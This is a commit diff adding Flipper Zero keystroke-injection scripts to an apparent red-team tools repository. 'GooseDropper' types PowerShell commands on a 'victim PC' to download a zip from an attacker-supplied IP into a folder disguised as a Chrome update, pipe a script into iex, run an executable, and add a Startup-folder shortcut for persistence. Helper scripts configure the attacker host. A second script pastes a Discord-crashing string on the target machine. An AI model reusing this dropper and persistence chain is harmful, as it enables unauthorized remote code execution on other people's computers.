Goose Dropper V2.1

Reflect non-functionality

Duckyscripts/GooseDropper/GooseDropper.txt

@@ -0,0 +1,23 @@
+REM TITLE GooseDropper
+REM AUTHOR Fr3ki
+REM DESCRIPTION Grab the Desktop Goose executable from an attacker machine and run it on the victim PC
+DELAY 500
+GUI r
+DELAY 500
+STRING powershell wget YOUR_IP/ZIP -OutFile $ENV:Temp/Update.zip
+ENTER
+DELAY 8000
+GUI r
+DELAY 500
+STRING powershell Expand-Archive $ENV:Temp\Update.zip -DestinationPath $ENV:Temp\Chrome_Update
+ENTER
+DELAY 3000
+GUI r
+DELAY 500
+STRING powershell gc $env:Temp\Chrome_Update\Update\PersistentGoose.ps1 | iex
+ENTER
+DELAY 1000
+GUI r
+DELAY 500
+STRING %Temp%\Chrome_Update\Update\GooseDesktop.exe
+ENTER

Duckyscripts/GooseDropper/PersistentGoose.ps1

@@ -0,0 +1,6 @@
+$WScriptShell = New-Object -ComObject WScript.Shell
+$TargetFile = "$env:Temp\Chrome_Update\Update\GooseDesktop.exe"
+$ShortcutFile = "C:\Users\$env:UserName\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HONK.lnk"
+$Shortcut = $WScriptShell.CreateShortcut($ShortcutFile)
+$Shortcut.TargetPath = $TargetFile
+$Shortcut.Save()

Duckyscripts/GooseDropper/README.md

@@ -0,0 +1,25 @@
+**======= Goose Dropper v2.0 ========**
+
+This is a duckyscript originally designed for Flipper-Zero to drop Desktop Goose (by Samperson) on a Windows PC. **NOW WITH PERSISTENCE**
+
+
+--------------------------------------------------------------------------------------------------------------
+**Important Notes:**
+
+Ensure configuration is run while on the same network as your target, re-configure with each new network, unless the download location provided is publicly accessible.
+
+All credit goes to Samperson for the development of Desktop Goose: https://itch.io/profile/samperson | https://twitter.com/samnchiet
+
+**=== v2.0 Notes ==**
+    
+    Added persistence via a PowerShell script that makes a shortcut in the startup folder.
+    
+    Revamped updater with more options and better dialogue. 
+    
+    Bugfixes to ensure payloads get delivered successfully.
+
+**=== v2.1 Notes ==**
+    
+    Simplified configurators to remove unnecessary complexity
+    
+    Added Windows auto-configuration tool.

Duckyscripts/GooseDropper/linux_setup.sh

@@ -0,0 +1,31 @@
+#!/bin/bash
+
+IP=$1
+ZIP=$2
+PERSIST=$3
+
+#Ensure required arguments are not empty
+if [ "${IP}" == "" ] | [ "${ZIP}" == "" ];
+then
+  echo "Usage: sh linux_setup.sh <IP_Address/URL> <path_to_desktop_goose.zip> <persist y/n>"
+  exit
+fi
+
+#Check for help command
+if [ "${IP,,}" == "-h" ] | [ "${IP,,}" == "help" ];
+then
+  echo "Usage: sh linux_setup.sh <IP_Address/URL> <path_to_desktop_goose.zip> <persist y/n>"
+  exit
+fi
+
+#Replace placeholders with provided values
+sed -i "s/YOUR_IP/$IP/" GooseDropper.txt
+sed -i "s/ZIP/$ZIP/" GooseDropper.txt
+
+#Remove persistance if desired
+if [ "${PERSIST,,}" == "n" ];
+then
+	sed -i "15d;16d;17d;18d;19d" GooseDropper.txt
+else
+	break
+fi

Duckyscripts/GooseDropper/windows_setup.ps1

@@ -0,0 +1,30 @@
+param (
+    [string]$HELP,
+    [string]$IP,
+    [string]$ZIP,
+    [string]$PERSIST
+)
+
+# Ensure required arguments are not empty
+if (-not $IP -or -not $ZIP) {
+    Write-Host "Usage: .\windows_setup.ps1 <IP_Address/URL> <path_to_desktop_goose.zip> <persist y/n>"
+    exit
+}
+
+# Check for help command
+if ($HELP) {
+    Write-Host "Usage: .\windows_setup.ps1 <IP_Address/URL> <path_to_desktop_goose.zip> <persist y/n>"
+    exit
+}
+
+# Replace placeholders with provided values
+(Get-Content "GooseDropper.txt") | ForEach-Object { $_ -replace 'YOUR_IP', $IP -replace 'ZIP', $ZIP } | Set-Content "GooseDropper.txt"
+
+# Remove persistence if desired
+if ($PERSIST.ToLower() -eq "n") {
+    $lines = Get-Content "GooseDropper.txt"
+    $lines = $lines[0..14] + $lines[19..($lines.Length - 1)]
+    Set-Content "GooseDropper.txt" $lines
+} else {
+    break
+}

Duckyscripts/Kill_Discord/README.txt

@@ -0,0 +1,12 @@
+# This specific "Exploit" has been patched and is no-longer usable.
+---
+
+Kill_Discord is a duckyscript that does exactly what the name implies.
+
+As of April 2024 the string "http://./\<#0>:  ://./<#0>" without the quotes will crash your Discord client when pasted into any message box.
+
+This script opens Discord on the target machine and pastes that string into the first available text box.
+
+Just to reitterate this crashes the Discord client of the SENDER, hence the need for a duckyscript.
+
+As always, don't be a skid, and only use these scripts on devices which you are expresely authorized to use them on. I am not liable for any unauthorized usage or damage caused by the usage of this tool.

Duckyscripts/Kill_Discord/kill_discord.txt

@@ -0,0 +1,12 @@
+DELAY 500
+GUI r
+DELAY 500
+STRING C:\ProgramData\%USERNAME%\Discord\Update.exe --processStart Discord.exe
+DELAY 500
+ENTER
+DELAY 2000
+CTRL k
+DELAY 100
+ENTER
+DELAY 500
+STRING http://./\<#0>:  ://./<#0>

README.md

@@ -1,2 +1,6 @@
 # Misadventures
-Red/Purple-Team tools
+This is a set of Red and Purple team tools I've developed, mostly just for fun, but some may find them useful.
+
+Feel free to leave tips, comments, or suggestion in the comments, on my website at https://fr3ki.xyz or my twitter @Fr3ki_
+
+Licence: https://www.gnu.org/licenses/gpl-3.0.html